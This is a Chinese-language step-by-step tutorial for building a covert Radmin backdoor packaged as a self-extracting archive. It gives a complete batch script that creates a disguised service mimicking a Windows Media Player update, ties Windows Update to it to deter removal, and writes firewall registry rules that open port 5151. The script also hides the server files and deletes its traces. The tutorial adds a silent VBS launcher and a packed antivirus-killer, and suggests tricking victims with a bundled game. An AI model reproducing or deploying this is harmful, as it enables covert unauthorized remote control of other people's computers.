准备工具
Rock免杀工具;
IcoSprite图标更改器;
Killer15杀杀毒软件防火墙工具;
SC.exe服务添加删除更改工具;
AdmDll.dll、Raddrv.dll、R_server(这个不用说了吧,Radmin的服务端)。
程序特点
自解压形式,双击即可,自动解压到%systemroot%\system32\ drivers\目录下,并能干掉卡巴斯基等杀毒软件。使用vbs嵌套bat来执行所有内容,不会跳出任何窗口。自建服务,并修改服务名、显示名、描述使 其做到隐蔽。依存Windows Update服务,给试图关闭它带来困惑。做完一切后以只读,隐藏形式隐蔽Radmin服务端的三个程序,删除掉生成的一些REG、BAT、VBS文件, 并能够突破Radmin外部连接进来时XP SP2防火墙的拦截。
制作过程
首先自己安装一下Radmin服务端,配置完密码,端口等信息后导出其在 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件,这里我另存为名Server.reg。然后要修改 R_server.exe的图标并修改文件名为迷惑性文字如Update.exe,修改图标我用IcoSprite,觉得还不错。这样假如对方装有天网之 类防火墙的话,可以骗过一些菜鸟,同意允许对外连接。
接下来我们制作核心部分,最关键的BAT,重要的我将简单解释: 
@echo off 
@sc stop r_server 
‘假如已经被装过R_server服务,先用SC将它停掉。 
@sc delete r_server 
‘将已经装过R_server服务删除。 
@regedit /s server.reg 
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= 
own type= interact start= auto DisplayName= "Media Player of Remote Control Driver 
Update" 
‘这句是用SC建立一个服务,服务名为Mpservice,路径Binpath为"%systemroot%\system32
\drivers\Update.exe /service",类型type为 own 与interact交互,启动类型start为自动,
显示名DisplayName为"Media Player of Remote Control Driver Update"。 
@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。" 
‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。” 
@sc config wuauserv depend= MPservice 
‘配置MPservice使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的
wuauserv是系统在Windows Update 
网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的Radmin服务。 
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32
\drivers\DisFirewall.reg 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\
StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg 
‘这里添加成的一个DisFirewall.reg注册表文件,在对方是XP SP2系统的情况下
将起到很大重要,由于SP2自带的防火墙配置信息是存
放于注册表中的,所有完全可以通过写入自己想要的信息使你的R_server可以接受
外界的连接。 
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32
\drivers\DisFirewall.reg 
‘这句是允许外部连接5151的TCP端口,设置防火墙此规则名为Windows Update Services。 
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg 
@attrib +h +r %systemroot%\system32\drivers\Update.exe 
@attrib +h +r %systemroot%\system32\drivers\admdll.dll 
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll 
‘以上三句是设置服务端三个文件为隐藏、只读属性。 
@sc start MPservice 
@del /q /f /s %systemroot%\system32\drivers\server.reg 
@del /q /f /s %systemroot%\system32\drivers\Update.vbs 
@del /q /f /s %systemroot%\system32\drivers\Update.bat 
@del /q /f /s %systemroot%\system32\drivers\sc.exe 
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg 
‘以上是清理生成出来的杂物,加参数/q是以安静模式删除,不要求确认,
参数/f是强制删除只读文件,参数/s是从所有子目录删除指定文件。
接下来制作一个vbs文件,作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。里面写上如下代码: 
On Error Resume Next 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("Update.bat",0)
最后出场的是Killer15.exe这个东东,按它的说明书说是可以杀Norton AntiVirus、McAfee、个人计算机Cillin&KAV等。我用我的卡巴2006测试过,确实能被它杀掉。由于直接运行的话还没执行 就被杀毒软件给干掉了,所以给它加个壳,这里用Rock免杀工具,经过它加的壳后逃过了我卡巴的大关,格式是: 
usage: rock [filename]
好了,整理一下:三个服务端文件+一个注册表信息,一个BAT,一个VBS,一个SC,一个 Killer15,一共是8个文件,将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”,到高级里打开“自解压选项”,“解压路径”为 %systemroot%\system32\drivers\,解压后运行“Update.vbs”,解压前运行 “Killer15.new.exe”,模式里选“全部隐藏”跟“跳过已经存在文件”,文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的 ico图标做为自解压最后生成的图标。OK,一个自解压形式的Radmin服务端就这样生成了。假如你是*欺骗别人双击执行的,你还可以自己添加个小游戏 之类的进去,令它双击自解压的同时不会什么反映都没有,这里我就不再阐述了。